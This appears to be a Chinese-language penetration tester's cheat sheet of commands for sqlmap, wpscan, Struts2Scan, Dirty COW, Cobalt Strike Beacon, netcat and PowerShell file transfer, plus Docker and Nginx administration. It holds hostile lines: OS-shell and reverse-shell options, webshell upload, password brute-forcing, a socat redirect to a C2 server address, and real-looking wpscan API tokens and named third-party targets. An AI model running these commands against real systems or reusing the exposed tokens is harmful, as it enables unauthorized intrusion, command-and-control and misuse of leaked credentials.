各种渗透小工具常用命令参数总结

渗透过程中用到很多小工具：有的时候指令参数感觉比较难记，去搜还比较费时间，所以想了一个小办法提高效率，把常用的参数本地记下来，时不时看一看，或者用的时候直接修改贴上去就行，如下：（本机环境python默认为python3，python2为python2）

sqlmap    
	常用指令：
		--identify-waf  sqlmap安全狗试探
		--technique  B E U S T
		--random-agent --dbs   --delay 2 -v 3 --risk 3  --batch  
		–os-pwn 联动MSF反弹shell   
		sqlmap -d "mssql://uset:password@ip:port/dbname" --os-shell  外连数据库操作命令
		--os-shell  写入webshell或者命令shell 默认会有一个命令文件和上传文件
		python sqlmap.py -u "hid=1" --file-dest="E://php///phpinfo.php写入目标路径" --file-write="E:/WWW//phpinfo.php本地shell路径"  写之前先看dba --privileges
	绕过防护：--tamper
		WTS：and换成&& symboliclogical.py  
		
sublist3r   目录爆破 python2.7  python3.4   
		python2 sublist3r.py -b -v -d  lzu.edu.cn -p 80,443   -t 50 -o lzu.txt
OneForAll  子域名收集  py3.7    
		oneforall模块：
		python oneforall.py --target 1.txt --format=txt  --brute=true run
dirmap 
		单目标  python dirmap.py -i https://target.com -lcf       python dirmap.py -i 192.168.1.1 -lcf
		子网    python dirmap.py -i 192.168.1.0/24 -lcf    python dirmap.py -i 192.168.1.1-192.168.1.100 -lcf
		文件读取  python dirmap.py -iF targets.txt -lcf  
		
Arjun   请求参数fuzz工具：一般参数fuzz可以从JS中找到  py3
    单个URL：python arjun.py -u https://api.example.com/endpoint --get     或者--post     -t 22 多线程  -d 2延迟
    多个URL：python arjun.py --urls targets.txt --get            --include '{"api_key":"xxxxx"}'API密钥
	对HTTP参数进行fuzz  py>3.4  -t 20 设置线程  --headers  加请求头
	python arjun.py -u https://api.example.com/endpoint --get/--post  不同请求
	python arjun.py -u https://api.example.com/endpoint --get -d 2    延搁请求发送时间
	python arjun.py -u https://api.example.com/endpoint --get --include 'api_key=xxxxx'  引入固定数据
	
nmap  
	常用命令：
		nmap -sS -iL sub_domain.txt -oX school.xml   批量扫描后输出
		nmap -p 25 --script smtp-enum-users.nse 202.38.193.203   25端口 邮箱枚举
		
wpscan    https://wpvulndb.com/users/edit    --force | -f   不检查网站运行的是不是`WordPress`
		wpscan --url https://wp.tutorabc.com/ -e --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I    #-e简单进行整体快速扫描
		wpscan --url http://10.10.10.10 --enumerate vp --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I   简单扫描WP插件
		wpscan --url https://intro.vipjr.com --enumerate ap --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I  完整扫描WP插件
		wpscan --url http://10.10.10.10  --enumerate u 枚举WP用户名
		wpsan --url http://10.10.10.10 --enumerate vt  扫描所使用的主题和漏洞
		wpscan -u https://www.xxxxxx.wiki/ -enumerate tt    TimThumbs文件漏洞扫描
		wpscan --url http://10.10.10.128/wordpress -P /root/Desktop/xray/rockyou.txt -U admin -t 100 #指定用户名为admin，密码为 /root/Desktop/xray/rockyou.txt 字典文件中的数据 设置线程100

xray  
xray.exe  webscan --listen 127.0.0.1:1111 --html-output awvs.html  联动
xray.exe  webscan --basic-crawler http://testphp.vulnweb.com/ --html-output xray-crawler.html   爬虫自动挖

Crawlergo   targets.txt 里面的地址放http://testphp.vulnweb.com/这个格式
python launcher_new.py

Struts2-Scan： py3
	python Struts2Scan.py --info  查看信息
	python Struts2Scan.py -u http://192.168.100.8:8080/index.action   单个检测
	python Struts2Scan.py -f urls.txt   批量检测
	python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --exec   指定漏洞 命令执行
	python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --reverse 192.168.100.8:8888  反弹shell
	python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --webpath  获取web路径
	python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp  上传shell
	
WebCrack.py  py3 后台爆破 不支持验证码  爆破结果：web_crack_ok.txt
	python WebCrack.py  
	输入文件名则进行批量爆破，输入URL则进行单域名爆破
		
Docker  docker version	docker info	docker --help
	镜像命令
		docker images 查看所有镜像
		docker search “tomcat”    或从http://hub.docker.com查
		docker pull tomcat   下载镜像
		docker rmi tomcat    删除镜像
	容器命令
		docker run -it --tomcat 运行
		docker run -p 8080:8080 镜像名   端口映射执行
		docker ps -a   列出正在运行的容器
		docker ps -aq  列出正在运行的容器ID  
		exit 容器停止并退出
		docker start 容器ID 启动容器
		docker restart 容器ID 重启容器
		docker stop 容器ID 停止容器
		docker stop $(docker ps -aq)   停止所有容器
		docker attach 容器ID     直接进入容器启动命令的终端，不会启动新的进程
		docker cp mycontainer:/opt/file.txt /opt/local/    复制文件
		docker-compose down        环境移除
		docker image prune -f -a   删除所有暂时不使用的镜像
		docker container prune -f  删除所有停止的镜像
		docker-compose run --rm -p 8080:80 web  docker容器端口映射
		docker network prune   不被docker使用的network都将被清理掉
		   
	docker exec -ti name /bin/bash   进入docker容器查看	
	杀死占用端口命令：
	kill -9 $(lsof -i tcp:进程号 -t)
	sudo kill -s 9 $(lsof -i:端口号 -t)
	docker ps |awk '{print($1)}' |xargs -n 1 docker stop   		

脏牛提权：dirty.c  大于2.6.22版本（Linux bogon）
		查看版本：uname -a
		编译：gcc -pthread dirty.c -o dirty -lcrypt
		执行: ./dirty  低权限用户名
kali搜索版本漏洞：searchsploit  ubuntu 16


CS4.0
传输器 传输体
监听器（Beacon Foreign ）Beacon是CS的Payload
Beacon有两种通信模式。(异步通信模式/交互式通信模式)
Beacon的类型(HTTP 和 HTTPS Beacon/DNS Beacon/SMB Beacon)
重定向器(目标靶机 <-------->多个并列的重定向器<------>CS服务器)
socat TCP4-LISTEN:9999,fork TCP4:158.247.199.169:9999  socat转发流量到CS服务器

Beacon 命令
help 			查看beacon shell所有内置命令帮助,如果想查看指定命令的用法,可以这样,eg: help checkin
note 			给当前目录机器起个名字, eg: note beacon-shell
cd			在目标系统中切换目录,注意在win系统中切换目录要用双反斜杠,或者直接用'/' eg: cd c:\\
mkdir 			新建目录, eg: mkdir d:\\beacon
rm 			删除文件或目录, eg: rm d:\\beacon
upload 			上传文件到目标系统中
download		从目标系统下载指定文件,eg: download C:\\Users\\win7cn\\Desktop\\putty.exe
cancel			取消下载任务,比如,一个文件如果特别大,下载可能会非常耗时,假如中途你不想继续下了,就可以用这个取消一下
shell			在目标系统中执行指定的cmd命令, eg: shell whoami
getuid 			查看当前beacon 会话在目标系统中的用户权限,可能需要bypassuac或者提权
pwd			查看当前在目录系统中的路径
ls			列出当前目录下的所有文件和目录
drives			列表出目标系统的所有分区[win中叫盘符]
ps			查看目标系统当前的所有的进程列表
kill			杀掉指定进程, eg: kill 4653
sleep 10		指定被控端休眠时间,默认60秒一次回传,让被控端每10秒来下载一次任务,实际中频率不宜过快,容易被发现,80左右一次即可
jobs			列出所有的任务列表,有些任务执行时间可能稍微较长,此时就可以从任务列表中看到其所对应的具体任务id,针对性的清除
jobkill			如果发现任务不知是何原因长时间没有执行或者异常,可尝试用此命令直接结束该任务, eg: jobkill 1345
clear			清除beacon内部的任务队列
checkin			强制让被控端回连一次
exit 			终止当前beacon 会话
ctrl + k 		清屏
checkin         激活beacon 使其回连
help mode       查看传输模式
mode dns        传输模式-dns(每次传输4比特数据)
mode dns-txt    切换传输模式-dns-txt（每次传输189比特数据）

	
WeblogicScan  python3
python WeblogicScan.py -u 127.0.0.1 -p 7001  单点
python WeblogicScan.py -f target.txt 批量  txt格式127.0.0.1:7001  或127.0.0.1 或127.0.0.1:700


命令行终端下载：
wget -b http://www.sample-videos.com/video/mp4/big.mp4  隐藏下载
curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4  下载重命名
python：
#!python
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()
Netcat 
cat file | nc -l 1234    攻击机将文件放到1234端口  
nc host_ip 1234 > file   目标机连接该端口就会接收到
powershell：
$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file" "C:\%homepath%\file")

http://xl.bhcy.cn/addme.asp


python atlas.py --url http://eci-2zedsrkf2aml8sk5i8w3.cloudeci1.ichunqiu.com/?id=%%1%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v


Nginx 配置
	sudo systemctl stop nginx  
	systemctl start nginx
	systemctl restart nginx
	systemctl reload nginx   一些配置更改后，重新加载Nginx服务
	systemctl disable nginx  禁止Nginx服务在服务器启动时启动


netstat -tulnp | grep ":53"             看端口是否被占用
netstat -ntlp                           查看端口使用情况
service iptables status  	
iptables -A INPUT -ptcp --dport  53  -j ACCEPT   开端口

　　持续更新，算个小分享和学习方法分享吧